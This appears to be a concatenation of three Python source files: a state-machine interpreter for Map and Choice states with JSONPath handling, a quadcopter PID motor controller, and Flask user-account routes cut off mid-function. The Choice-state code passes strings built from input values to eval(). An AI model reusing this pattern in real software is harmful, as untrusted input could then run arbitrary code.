self._logger.debug("[StateUtils] Map state handling")
if "__state_action" not in metadata or metadata["__state_action"] != "post_map_processing":
# here we start the iteration process on a first batch
if maxConcurrency != 0:
tobeProcessednow = function_input[:maxConcurrency] # take the first maxConcurrency elements
tobeProcessedlater = function_input[maxConcurrency:] # keep the remaining elements for later
else:
tobeProcessednow = function_input
tobeProcessedlater = []
self._logger.debug("[StateUtils] Map state function_input split:" + str(tobeProcessednow) + " " + str(tobeProcessedlater))
sapi.put(name_prefix + "_" + "tobeProcessedlater", str(tobeProcessedlater)) # store elements to be processed on DL
sapi.put(name_prefix + "_" + "mapStatePartialResult", "[]") # initialise the collector variable
sapi.put(name_prefix + "_" + "mapInputCount", str(len(function_input)))
function_output, metadata = self.evaluateMapState(tobeProcessednow, key, metadata, sapi)
elif metadata["__state_action"] == "post_map_processing":
tobeProcessedlater = ast.literal_eval(sapi.get(name_prefix + "_" + "tobeProcessedlater")) # get all elements that have not yet been processed
self._logger.debug("[StateUtils] Map state post_map processing input:" + str(tobeProcessedlater))
# we need to decide at this point if there is a need for more batches. if so:
if len(tobeProcessedlater) > 0: # we need to start another batch
function_output, metadata2 = self.evaluatePostMap(function_input, key, metadata, sapi) # take care not to overwrite metadata
function_output, metadata = self.evaluateMapState(tobeProcessedlater[:maxConcurrency], key, metadata, sapi) # start a new batch
sapi.put(name_prefix + "_" + "tobeProcessedlater", str(tobeProcessedlater[maxConcurrency:])) # store remaining elements to be processed on DL
else:# no more batches required. we are at the iteration end, publish the final result
self._logger.debug("[StateUtils] Map state input final stage: " + str(function_input))
function_output, metadata = self.evaluatePostMap(function_input, key, metadata, sapi)
else:
raise Exception("Unknow action type in map state")
else:
raise Exception("Unknown state type")
return function_output, metadata
def applyResultPath(self, raw_state_input, function_output):
#4. Apply ResultPath, if available and if not 'Parallel' state
# if ResultPath:
# if ResultPath == '$' (this is the default value)
# raw_state_input_midway = function_output
# if ResultPath == 'null'
# raw_state_input_midway = raw_state_input
# if ResultPath == some variable name
# raw_state_input[some variable name] = function_output
# raw_state_input_midway = raw_state_input
# else:
# raw_state_input_midway = function_output
#
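        # Illustrative example (hypothetical values): with raw_state_input = {"a": 1},
        # function_output = {"b": 2} and ResultPath = "$.result", the midway value
        # becomes {"a": 1, "result": {"b": 2}}.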
raw_state_input_midway = raw_state_input
#self._logger.debug("Reached applyResultPath: " + str(self.result_path_dict))
try:
if self.result_path_dict and 'ResultPath' in self.result_path_dict:
raw_state_input_midway = self.process_result_path(self.result_path_dict, raw_state_input, function_output)
else:
raw_state_input_midway = function_output
return raw_state_input_midway
except Exception as exc:
raise Exception("Result path processing exception: " + str(exc))
#self._logger.exception("Result path processing exception")
#sys.stdout.flush()
#self._logger.exception(exc)
#raise
def applyOutputPath(self, raw_state_input_midway):
#5. Apply OutputPath, if available
# if OutputPath:
# if OutputPath == '$' (this is the default value)
# raw_state_output = raw_state_input_midway
# if OutputPath = 'null'
# raw_state_output = {}
# if OutputPath == some existing variable in 'raw_state_input_midway'
# raw_state_output = raw_state_input_midway[some existing variable]
# if OutputPath == some non-existing variable
# throw exception
# else:
# raw_state_output = raw_state_input_midway
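        # Illustrative example (hypothetical values): with raw_state_input_midway =
        # {"a": 1, "result": {"b": 2}} and OutputPath = "$.result", the state output
        # becomes {"b": 2}.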
raw_state_output = raw_state_input_midway
try:
if self.output_path_dict and 'OutputPath' in self.output_path_dict:
raw_state_output = self.process_output_path(self.output_path_dict, raw_state_input_midway)
else:
raw_state_output = raw_state_input_midway
return raw_state_output
except Exception as exc:
raise Exception("Output path processing exception: " + str(exc))
#self._logger.exception("Output path processing exception")
#sys.stdout.flush()
#self._logger.exception(exc)
#raise
def parse_function_state_info(self):
if self.functionstatetype == StateUtils.defaultStateType:
#self._logger.debug("Task_SAND state parsing. Not parsing further")
return
else:
self.parsedfunctionstateinfo = json.loads(self.functionstateinfo)
statedef = self.parsedfunctionstateinfo
statetype = self.functionstatetype
assert statetype == statedef['Type']
if statetype == StateUtils.waitStateType:
self._logger.debug("Wait state parsing")
if statetype == StateUtils.failStateType:
self._logger.debug("Fail state parsing")
if statetype == StateUtils.succeedStateType:
self._logger.debug("Succeed state parsing")
if statetype == StateUtils.taskStateType:
#self._logger.debug("Task state parsing")
if "InputPath" in statedef: # read the I/O Path dicts
self.input_path_dict['InputPath'] = statedef['InputPath']
#self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
#self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
if "Catch" in statedef:
self.catcher_list = statedef['Catch']
# parse it once and store it
self.catcher_list = ast.literal_eval(str(self.catcher_list))
#self._logger.debug("found Catchers: " + str(self.catcher_list))
if "Retry" in statedef:
self.retry_list = statedef['Retry']
# parse it once and store it
self.retry_list = ast.literal_eval(str(self.retry_list))
#self._logger.debug("found Retry: " + str(self.retry_list))
if statetype == StateUtils.choiceStateType:
#self._logger.debug("Choice state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(statedef['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(statedef['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
self._logger.debug("Choice state rules: " + json.dumps(statedef))
if "Default" in statedef:
self.default_next_choice.append(statedef["Default"])
self._logger.debug("DefaultTarget: " + str(self.default_next_choice))
choices_list = statedef['Choices'] # get the choice rule list for this state
self._logger.debug("Choice state rules list: " + str(choices_list))
key_dict = {} # parse the choice rule list into an expression tree
for choices in choices_list:
self._logger.debug("Choice state rule element processed: " + json.dumps(list(choices.keys())))
#self._logger.debug("converted_function_output: " + str(converted_function_output))
operator_counter = 0
if ("Not" in list(choices.keys())) or ("And" in list(choices.keys())) or ("Or" in list(choices.keys())):
operator_counter += 1
if operator_counter == 0: # No operators, so no recursive evaluation required
self.traverse(choices['Next'], choices)
hostname = self.nodelist[-1].split("/")[0]
childname = self.nodelist[-1].split("/")[1]
previousnode = anytree.Node(choices['Next'])
root = previousnode
key_dict[hostname] = previousnode
previousnode = anytree.Node(childname, parent=previousnode) # key_dict[hostname])
#evalname = ast.literal_eval(str(previousnode.name))
else: # operator detected, we need to traverse the choice rule tree
self.traverse(choices['Next'], choices)
nodename = self.nodelist[-1].split("/")[0]
previousnode = anytree.Node(nodename)
root = previousnode
key_dict[self.nodelist[-1].split("/{")[0]] = previousnode
no_childs = 1 # we already have attached the root
                        for i in range(len(self.nodelist)): # count the nodes in the choice rule tree which do not have children
children = self.nodelist[-(i+1)].split("/")[-1]
if children.strip("") == "{}":
no_childs += 1
for i in range(no_childs):
nodename = self.nodelist[-(i+2)].split("/")[i+1]
previousnode = anytree.Node(nodename, parent=previousnode)
key_dict[self.nodelist[-(i+2)].split("/{")[0]] = previousnode
# from now on we have to attach the children expressions
for i in range(len(self.nodelist)-no_childs):
childname = self.nodelist[-(i+no_childs+1)].split("/")[-1]
hostname = self.nodelist[-(i+no_childs+1)].split("/{")[0]
previousnode = anytree.Node(childname, key_dict[hostname])
#self._logger.debug("Resulting Rendered Tree: " + str(anytree.RenderTree(root)))
self.parsed_trees.append(root)
if statetype == StateUtils.passStateType:
self._logger.debug("[StateUtils] Pass state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
if statetype == StateUtils.parallelStateType:
#self._logger.debug("[StateUtils] Parallel state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
if statetype == StateUtils.mapStateType:
#self._logger.debug("[StateUtils] Parallel state parsing")
if "InputPath" in statedef:
self.input_path_dict['InputPath'] = statedef['InputPath']
self._logger.debug("found InputPath: " + json.dumps(self.input_path_dict['InputPath']))
if "ItemsPath" in statedef:
self.items_path_dict['ItemsPath'] = statedef['ItemsPath']
self._logger.debug("found ItemsPath: " + json.dumps(self.items_path_dict['ItemsPath']))
if "ResultPath" in statedef:
self.result_path_dict['ResultPath'] = statedef['ResultPath']
self._logger.debug("found ResultPath: " + json.dumps(self.result_path_dict['ResultPath']))
if "OutputPath" in statedef:
self.output_path_dict['OutputPath'] = statedef['OutputPath']
self._logger.debug("found OutputPath: " + json.dumps(self.output_path_dict['OutputPath']))
if "Parameters" in statedef:
self.parameters_dict['Parameters'] = statedef['Parameters']
self._logger.debug("found Parameters: " + json.dumps(self.parameters_dict['Parameters']))
def EvaluateNode(self, node):
"""
Recursively parse the expression tree starting from given node into a python statement
"""
if not node.children: # this is a leaf node
evalname = json.dumps(ast.literal_eval(str(node.name)))
#type(evalname) == int or type(evalname) == float:
ev_expr = "(" + self.evaluate(evalname) + ")"
return ev_expr
else: #node is an operator
if node.name == "Not": # there can be only one child
child = node.children[0]
evalname = json.dumps(ast.literal_eval(str(child.name)))
ev_expr = self.evaluate(evalname)
return "not (%s)" % ev_expr
if node.name == "And": # collect all children recursively
child_and_array = []
for child in node.children:
child_and_array.append(self.EvaluateNode(child))
returnstr = "(" + " and ".join(child_and_array) + ")"
return returnstr
if node.name == "Or": # collect all children recursively
child_or_array = []
for child in node.children:
child_or_array.append(self.EvaluateNode(child))
returnstr = "(" + " or ".join(child_or_array) + ")"
return returnstr
            else: # unknown operator found here, raise an error
raise Exception("Parse Error: unknown operator found: ", node.name)
def evaluate(self, expression):
"""
        Turn an AWS Choice rule expression into a Python comparison string.
"""
expr = []
ex = json.loads(expression)
self._logger.debug(expression)
vals = {}
if "Variable" in ex.keys():
k = ex["Variable"].split("$.")[1]
vals[k] = ""
expr.append(k)
for op in self.operators:
if op in ex.keys():
expr.append(self.operators_python[self.operators.index(op)])
expr.append(ex[op])
break
if isinstance(expr[2], (int, float)):
result = "%s %s %s" % (expr[0], expr[1], expr[2])
else:
result = "%s %s '%s'" % (expr[0], expr[1], expr[2]) # we want to compare strings with strings
return result
def process_parameters(self, parameters, state_data):
"""
        Evaluate the JSON path 'Parameters' field in conjunction with state_data.
"""
parameters = parameters['Parameters']
ret_value = None
ret_item_value = None
if parameters == "$": # return unfiltered input data
ret_value = state_data
elif parameters is None: #return empty json
ret_value = {}
else: # contains a parameter filter, get it and return selected kv pairs
ret_value = {}
ret_index = {}
for key in parameters.keys(): # process parameters keys
if key.casefold() == "comment".casefold(): # ignore
ret_value[key] = parameters[key]
elif parameters[key] == "$$.Map.Item.Value": # get Items key
value_key = key.split(".$")[0]
ret_value = value_key
ret_item_value = value_key
elif parameters[key] == "$$.Map.Item.Index": # get Index key
index_key = key.split(".$")[0]
ret_index = index_key
else: # processing more complex Parameters values
if isinstance(parameters[key], dict): # parameters key refers to dict value
ret_value[key] = {}
for k in parameters[key]: # get nested keys
if not k.split(".")[-1] == "$": # parse static value
print (parameters[key][k])
ret_value[key][k] = parameters[key][k]
else:
new_key = k.split(".$")[0] # use the json paths in paramters to match
ret_value[key][new_key] = [match.value for match in parse(parameters[key][k]).find(state_data)][0]
return ret_value
if isinstance(parameters[key], str): # parameters key refers to string value
ret_value = {}
new_key = key.split(".$")[0] # get the parameters key
                    query_key = parameters[key].split("$.")[1] # get the corresponding value key
new_value = state_data[query_key] # save the actual value before replacing the key
for kk in state_data.keys():
if isinstance(state_data[kk], dict): # value encapsulates dict
ret_value[new_key] = new_value
if ret_item_value != None:
ret_value[ret_item_value] = state_data[kk]
else:
raise Exception("Error: item value is not set!")
ret_value_dict = {}
ret_value_dict[kk] = ret_value
return ret_value_dict
if isinstance(state_data[kk], list): # value encapsulates list
ret_value_list = []
for data in state_data[kk]:
ret_value_list.append({new_key: new_value, ret_item_value: data})
ret_value_dict = {}
ret_value_dict[kk] = ret_value_list
return ret_value_dict
else:
raise Exception("Error: invaldid Parmeters format: " + str(parameters[key]))
# calculate transformed state output provided to Iterator
ret_total = []
ret_total_dict = {}
if isinstance(state_data, dict):
for kk in state_data.keys():
for key in state_data[kk]:
if ret_value != {} and ret_index == {}:
ret_total.append({ret_value: key})
elif ret_value == {} and ret_index != {}:
ret_total.append({ret_index: state_data[kk].index(key) })
elif ret_value != {} and ret_index != {}:
ret_total.append({ret_value: key, ret_index: state_data[kk].index(key) })
else:
raise Exception("Map State Parameters parse error on dict input: " + str(state_data))
ret_total_dict[kk] = ret_total
ret_value = ret_total_dict
elif isinstance(state_data, list):
for key in state_data:
if ret_value != {} and ret_index == {}:
ret_total.append({ret_value: key})
elif ret_value == {} and ret_index != {}:
ret_total.append({ret_index: state_data.index(key) })
elif ret_value != {} and ret_index != {}:
ret_total.append({ret_value: key, ret_index: state_data.index(key) })
else:
raise Exception("Map State Parameters parse error on list input: " + str(list))
ret_value = ret_total
else:
raise Exception("Map state parse error: invalid state input")
return ret_value
def process_items_path(self, path_fields, state_data):
ret_value = None
if 'ItemsPath' not in list(path_fields.keys()):
path_fields['ItemsPath'] = "$"
input_path = path_fields['ItemsPath']
if input_path == "$": # return unfiltered input data
ret_value = state_data
elif input_path is None: #return empty list
ret_value = []
else: # it contains a filter, get it and return selected list in input
self._logger.debug("seeing items_path filter: " + str(input_path) + " " + str(state_data))
filtered_state_data = [match.value for match in parse(input_path).find(state_data)]
if not filtered_state_data:
raise Exception("Items Path processing exception: no match with map state item, invalid path!")
else:
filtered_state_data = [match.value for match in parse(input_path).find(state_data)][0]
ret_value = filtered_state_data
return ret_value
def process_input_path(self, path_fields, state_data):
ret_value = None
if 'InputPath' not in list(path_fields.keys()):
path_fields['InputPath'] = "$"
#return state_data
input_path = path_fields['InputPath']
if input_path == "$": # return unfiltered input data
ret_value = state_data
elif input_path is None: #return empty dict
ret_value = {}
else: # input_path contains a filter, get and apply it
self._logger.debug("seeing input_path filter: " + str(input_path) + " " + str(state_data))
filtered_state_data = [match.value for match in parse(input_path).find(state_data)]
self._logger.debug("after seeing input_path filter: " + str(filtered_state_data))
if not filtered_state_data:
raise Exception("Input Path processing exception: no match with state input item, invalid path!")
else:
filtered_state_data = [match.value for match in parse(input_path).find(state_data)][0]
ret_value = filtered_state_data
return ret_value
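    # Helper below builds a nested dict from a list of keys, e.g. (illustrative):
    # nested_dict(["a", "b"], 5) -> {"a": {"b": 5}}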
def nested_dict(self, keys, value):
if len(keys) == 1:
return {keys[0]: value}
return {keys[0]: self.nested_dict(keys[1:], value)}
def process_result_path(self, path_fields, state_data, task_output):
ret_value = None
# path_fields: result path dict
# state_data: input dict
# task_output: output of the state/task
if 'ResultPath' not in list(path_fields.keys()):
path_fields['ResultPath'] = "$"
result_path = path_fields['ResultPath']
if result_path == "$":
ret_value = state_data
elif result_path is None:
ret_value = {}
else: # result_path is not empty so is there a match?
self._logger.debug("inside ResultPath processing: " + str(result_path) + " " + str(task_output) )
keys = list(tokenize(result_path)) # get all keys
filtered_state_data = self.nested_dict(keys[1:], task_output)
if isinstance(state_data, dict):
ret_value = dict(list(filtered_state_data.items()) + list(state_data.items())) # adding key and values to new dict
else:
ret_value = filtered_state_data
return ret_value
def process_output_path(self, path_fields, raw_state_input_midway):
ret_value = None
if 'OutputPath' not in list(path_fields.keys()):
path_fields['OutputPath'] = "$"
output_path = path_fields['OutputPath']
if output_path == "$":
ret_value = raw_state_input_midway
elif output_path is None:
ret_value = {}
else: # output_path is not empty so is there a match?
filtered_state_data = [match.value for match in parse(output_path).find(raw_state_input_midway)]
if not filtered_state_data:
raise Exception("Exception: no match with state input item, invalid path!")
else:
key = str(parse(output_path).nodes[-1].value[0])
filtered_state_data = raw_state_input_midway[key]
ret_value = filtered_state_data
return ret_value
def traverse(self, path, obj):
"""
        Traverse the object recursively and record every path / leaf-value pair in self.nodelist.
"""
cnt = -1
if isinstance(obj, dict):
d = obj
d_sum = {}
for k, v in list(d.items()):
if isinstance(v, dict):
self.traverse(path + "/" + k, v)
elif isinstance(v, list):
self.traverse(path + "/" + k, v)
else:
d_sum[k] = v
self.nodelist.append(path + "/" + str(d_sum))
if isinstance(obj, list):
li = obj
for e in li:
cnt += 1
if isinstance(e, dict):
self.traverse("{path}".format(path=path), e)
elif isinstance(e, list):
self.traverse("{path}".format(path=path), e)
def evaluateNextState(self, function_input):
# this should be called for Choice state only
# for the rest the next values are statically defined and are parsed by hostagent
if len(self.default_next_choice) > 0:
nextfunc = self.default_next_choice[-1]
self._logger.debug("[StateUtils] choice_function_input: " + str(function_input))
for tree in self.parsed_trees:
##self._logger.debug("Resulting Rendered Tree: " + str(anytree.RenderTree(tree.root)))
##self._logger.debug("Resulting Rendered Tree Root: " + str(tree.root))
test = self.EvaluateNode(tree.children[0])
self._logger.debug("[StateUtils] choice test: " + str(test))
self._logger.debug("Resulting Parsed Expression: " + str(test))
self._logger.debug("Current Value String: " + json.dumps(function_input))
# Sample value input to choice {"Comment": "Test my Iterator function", "iterator": {"count": 10, "index": 5, "step": 1}}
for key in list(function_input.keys()):
new_test = "False"
key = str(key)
if key == "Comment":
continue
#if "iterator.continue" == str(key):
self._logger.debug("[StateUtils] choice value key under test: " + key)
#keys = "continue"
if key in str(test):
val = function_input[key]
self._logger.debug("[StateUtils] choice val: " + str(val))
if isinstance(val, (int, float)): # calculate new_test value, no additional processing of values
self._logger.debug("[StateUtils] choice key/val: " + key + "/" + str(val))
new_test = test.replace(key, str(val))
self._logger.debug("[StateUtils] choice eval new_test: " + str(eval(str(new_test))))
elif "." in test: # need to process the json path of this variable name
test2 = "$." + test.lstrip('(').rstrip(')').split("==")[0] # rebuild the json path for the variable
jsonpath_expr = parse(test2)
choice_state_path_data = [match.value for match in jsonpath_expr.find(function_input)]
new_test = str(choice_state_path_data[0])
else:
new_test = test.replace(key, "'" + str(val)+"'") # need to add high colons to key to mark as string inside the expression
if eval(str(new_test)):
nextfunc = tree.root.name.strip("/")
self._logger.debug("now calling: " + str(nextfunc))
return nextfunc # {"next":nextfunc, "value": post_processed_value}
# if no choice rule applied, return the last one (assigned at the beginning)
self._logger.debug("now calling: " + str(nextfunc))
return nextfunc
|
controller.py
|
import numpy as np
import math
import time
import threading
class Controller_PID_Point2Point():
def __init__(self, get_state, get_time, actuate_motors, params, quad_identifier):
self.quad_identifier = quad_identifier
self.actuate_motors = actuate_motors
self.get_state = get_state
self.get_time = get_time
self.MOTOR_LIMITS = params['Motor_limits']
self.TILT_LIMITS = [(params['Tilt_limits'][0]/180.0)*3.14,(params['Tilt_limits'][1]/180.0)*3.14]
self.YAW_CONTROL_LIMITS = params['Yaw_Control_Limits']
self.Z_LIMITS = [self.MOTOR_LIMITS[0]+params['Z_XY_offset'],self.MOTOR_LIMITS[1]-params['Z_XY_offset']]
self.LINEAR_P = params['Linear_PID']['P']
self.LINEAR_I = params['Linear_PID']['I']
self.LINEAR_D = params['Linear_PID']['D']
self.LINEAR_TO_ANGULAR_SCALER = params['Linear_To_Angular_Scaler']
self.YAW_RATE_SCALER = params['Yaw_Rate_Scaler']
self.ANGULAR_P = params['Angular_PID']['P']
self.ANGULAR_I = params['Angular_PID']['I']
self.ANGULAR_D = params['Angular_PID']['D']
self.xi_term = 0
self.yi_term = 0
self.zi_term = 0
self.thetai_term = 0
self.phii_term = 0
self.gammai_term = 0
self.thread_object = None
self.target = [0,0,0]
self.yaw_target = 0.0
self.run = True
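    # wrap_angle maps any angle into [-pi, pi); e.g. wrap_angle(3*np.pi/2) == -np.pi/2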
def wrap_angle(self,val):
return( ( val + np.pi) % (2 * np.pi ) - np.pi )
def update(self):
[dest_x,dest_y,dest_z] = self.target
[x,y,z,x_dot,y_dot,z_dot,theta,phi,gamma,theta_dot,phi_dot,gamma_dot] = self.get_state(self.quad_identifier)
x_error = dest_x-x
y_error = dest_y-y
z_error = dest_z-z
self.xi_term += self.LINEAR_I[0]*x_error
self.yi_term += self.LINEAR_I[1]*y_error
self.zi_term += self.LINEAR_I[2]*z_error
dest_x_dot = self.LINEAR_P[0]*(x_error) + self.LINEAR_D[0]*(-x_dot) + self.xi_term
dest_y_dot = self.LINEAR_P[1]*(y_error) + self.LINEAR_D[1]*(-y_dot) + self.yi_term
dest_z_dot = self.LINEAR_P[2]*(z_error) + self.LINEAR_D[2]*(-z_dot) + self.zi_term
throttle = np.clip(dest_z_dot,self.Z_LIMITS[0],self.Z_LIMITS[1])
dest_theta = self.LINEAR_TO_ANGULAR_SCALER[0]*(dest_x_dot*math.sin(gamma)-dest_y_dot*math.cos(gamma))
dest_phi = self.LINEAR_TO_ANGULAR_SCALER[1]*(dest_x_dot*math.cos(gamma)+dest_y_dot*math.sin(gamma))
dest_gamma = self.yaw_target
dest_theta,dest_phi = np.clip(dest_theta,self.TILT_LIMITS[0],self.TILT_LIMITS[1]),np.clip(dest_phi,self.TILT_LIMITS[0],self.TILT_LIMITS[1])
theta_error = dest_theta-theta
phi_error = dest_phi-phi
gamma_dot_error = (self.YAW_RATE_SCALER*self.wrap_angle(dest_gamma-gamma)) - gamma_dot
self.thetai_term += self.ANGULAR_I[0]*theta_error
self.phii_term += self.ANGULAR_I[1]*phi_error
self.gammai_term += self.ANGULAR_I[2]*gamma_dot_error
x_val = self.ANGULAR_P[0]*(theta_error) + self.ANGULAR_D[0]*(-theta_dot) + self.thetai_term
y_val = self.ANGULAR_P[1]*(phi_error) + self.ANGULAR_D[1]*(-phi_dot) + self.phii_term
z_val = self.ANGULAR_P[2]*(gamma_dot_error) + self.gammai_term
z_val = np.clip(z_val,self.YAW_CONTROL_LIMITS[0],self.YAW_CONTROL_LIMITS[1])
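        # Motor mixing (a plus-style configuration is assumed here): x_val trims the
        # pitch pair (m1, m3), y_val trims the roll pair (m2, m4), and z_val is added
        # with alternating sign to produce yaw torque on top of the common throttle.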
m1 = throttle + x_val + z_val
m2 = throttle + y_val - z_val
m3 = throttle - x_val + z_val
m4 = throttle - y_val - z_val
M = np.clip([m1,m2,m3,m4],self.MOTOR_LIMITS[0],self.MOTOR_LIMITS[1])
self.actuate_motors(self.quad_identifier,M)
def update_target(self,target):
self.target = target
def update_yaw_target(self,target):
self.yaw_target = self.wrap_angle(target)
def thread_run(self,update_rate,time_scaling):
update_rate = update_rate*time_scaling
last_update = self.get_time()
while(self.run==True):
time.sleep(0)
self.time = self.get_time()
if (self.time - last_update).total_seconds() > update_rate:
self.update()
last_update = self.time
def start_thread(self,update_rate=0.005,time_scaling=1):
self.thread_object = threading.Thread(target=self.thread_run,args=(update_rate,time_scaling))
self.thread_object.start()
def stop_thread(self):
self.run = False
class Controller_PID_Velocity(Controller_PID_Point2Point):
def update(self):
[dest_x,dest_y,dest_z] = self.target
[x,y,z,x_dot,y_dot,z_dot,theta,phi,gamma,theta_dot,phi_dot,gamma_dot,_] = self.get_state(self.quad_identifier)
x_error = dest_x-x_dot
y_error = dest_y-y_dot
z_error = dest_z-z
self.xi_term += self.LINEAR_I[0]*x_error
self.yi_term += self.LINEAR_I[1]*y_error
self.zi_term += self.LINEAR_I[2]*z_error
dest_x_dot = self.LINEAR_P[0]*(x_error) + self.LINEAR_D[0]*(-x_dot) + self.xi_term
dest_y_dot = self.LINEAR_P[1]*(y_error) + self.LINEAR_D[1]*(-y_dot) + self.yi_term
dest_z_dot = self.LINEAR_P[2]*(z_error) + self.LINEAR_D[2]*(-z_dot) + self.zi_term
throttle = np.clip(dest_z_dot,self.Z_LIMITS[0],self.Z_LIMITS[1])
dest_theta = self.LINEAR_TO_ANGULAR_SCALER[0]*(dest_x_dot*math.sin(gamma)-dest_y_dot*math.cos(gamma))
dest_phi = self.LINEAR_TO_ANGULAR_SCALER[1]*(dest_x_dot*math.cos(gamma)+dest_y_dot*math.sin(gamma))
dest_gamma = self.yaw_target
dest_theta,dest_phi = np.clip(dest_theta,self.TILT_LIMITS[0],self.TILT_LIMITS[1]),np.clip(dest_phi,self.TILT_LIMITS[0],self.TILT_LIMITS[1])
theta_error = dest_theta-theta
phi_error = dest_phi-phi
gamma_dot_error = (self.YAW_RATE_SCALER*self.wrap_angle(dest_gamma-gamma)) - gamma_dot
self.thetai_term += self.ANGULAR_I[0]*theta_error
self.phii_term += self.ANGULAR_I[1]*phi_error
self.gammai_term += self.ANGULAR_I[2]*gamma_dot_error
x_val = self.ANGULAR_P[0]*(theta_error) + self.ANGULAR_D[0]*(-theta_dot) + self.thetai_term
y_val = self.ANGULAR_P[1]*(phi_error) + self.ANGULAR_D[1]*(-phi_dot) + self.phii_term
z_val = self.ANGULAR_P[2]*(gamma_dot_error) + self.gammai_term
z_val = np.clip(z_val,self.YAW_CONTROL_LIMITS[0],self.YAW_CONTROL_LIMITS[1])
m1 = throttle + x_val + z_val
m2 = throttle + y_val - z_val
m3 = throttle - x_val + z_val
m4 = throttle - y_val - z_val
M = np.clip([m1,m2,m3,m4],self.MOTOR_LIMITS[0],self.MOTOR_LIMITS[1])
self.actuate_motors(self.quad_identifier,M)
|
views.py
|
# project/users/views.py
#################
#### imports ####
#################
from flask import render_template, Blueprint, request, redirect, url_for, flash, abort
from sqlalchemy.exc import IntegrityError
from flask_login import login_user, current_user, login_required, logout_user
from flask_mail import Message
from threading import Thread
from itsdangerous import URLSafeTimedSerializer
from datetime import datetime
from twilio.rest import TwilioRestClient
from .forms import RegisterForm, LoginForm, EmailForm, PasswordForm, EditUserForm
from project import db, mail, app
from project.models import User
################
#### config ####
################
users_blueprint = Blueprint('users', __name__)
##########################
#### helper functions ####
##########################
def flash_errors(form):
for field, errors in form.errors.items():
for error in errors:
flash(u"Error in the %s field - %s" % (
getattr(form, field).label.text,
error
), 'info')
def send_async_email(msg):
with app.app_context():
mail.send(msg)
def send_email(subject, recipients, html_body):
msg = Message(subject, recipients=recipients)
msg.html = html_body
thr = Thread(target=send_async_email, args=[msg])
thr.start()
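# The confirmation and reset links below embed a timed, signed token (via itsdangerous)
# so the corresponding routes can later verify it; see the max_age=3600 checks in
# confirm_email() and reset_with_token().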
def send_confirmation_email(user_email):
confirm_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
confirm_url = url_for(
'users.confirm_email',
token=confirm_serializer.dumps(user_email, salt='email-confirmation-salt'),
_external=True)
html = render_template(
'email_confirmation.html',
confirm_url=confirm_url)
send_email('Confirm Your Email Address', [user_email], html)
def send_password_reset_email(user_email):
password_reset_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
password_reset_url = url_for(
'users.reset_with_token',
token = password_reset_serializer.dumps(user_email, salt='password-reset-salt'),
_external=True)
html = render_template(
'email_password_reset.html',
password_reset_url=password_reset_url)
send_email('Password Reset Requested', [user_email], html)
def send_new_user_text_message(new_user_email):
client = TwilioRestClient(app.config['ACCOUNT_SID'], app.config['AUTH_TOKEN'])
message = client.messages.create(
body="Kennedy Family Recipes... new user registered: {}".format(new_user_email), # Message body, if any
to=app.config['ADMIN_PHONE_NUMBER'],
from_=app.config['TWILIO_PHONE_NUMBER']
)
# flash('Text message sent to {}: {}'.format(app.config['ADMIN_PHONE_NUMBER'], message.body), 'success')
return
################
#### routes ####
################
@users_blueprint.route('/register', methods=['GET', 'POST'])
def register():
form = RegisterForm(request.form)
if request.method == 'POST':
if form.validate_on_submit():
try:
new_user = User(form.email.data, form.password.data)
new_user.authenticated = True
db.session.add(new_user)
db.session.commit()
login_user(new_user)
send_confirmation_email(new_user.email)
if 'ACCOUNT_SID' in app.config and not app.config['TESTING']:
send_new_user_text_message(new_user.email)
flash('Thanks for registering! Please check your email to confirm your email address.', 'success')
return redirect(url_for('recipes.user_recipes', recipe_type='All'))
except IntegrityError:
db.session.rollback()
flash('ERROR! Email ({}) already exists.'.format(form.email.data), 'error')
return render_template('register.html', form=form)
@users_blueprint.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm(request.form)
if request.method == 'POST':
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user is not None and user.is_correct_password(form.password.data):
user.authenticated = True
user.last_logged_in = user.current_logged_in
user.current_logged_in = datetime.now()
db.session.add(user)
db.session.commit()
login_user(user)
flash('Thanks for logging in, {}'.format(current_user.email))
return redirect(url_for('recipes.user_recipes', recipe_type='All'))
else:
flash('ERROR! Incorrect login credentials.', 'error')
return render_template('login.html', form=form)
@users_blueprint.route('/logout')
@login_required
def logout():
user = current_user
user.authenticated = False
db.session.add(user)
db.session.commit()
logout_user()
flash('Goodbye!', 'info')
return redirect(url_for('recipes.public_recipes'))
@users_blueprint.route('/confirm/<token>')
def confirm_email(token):
try:
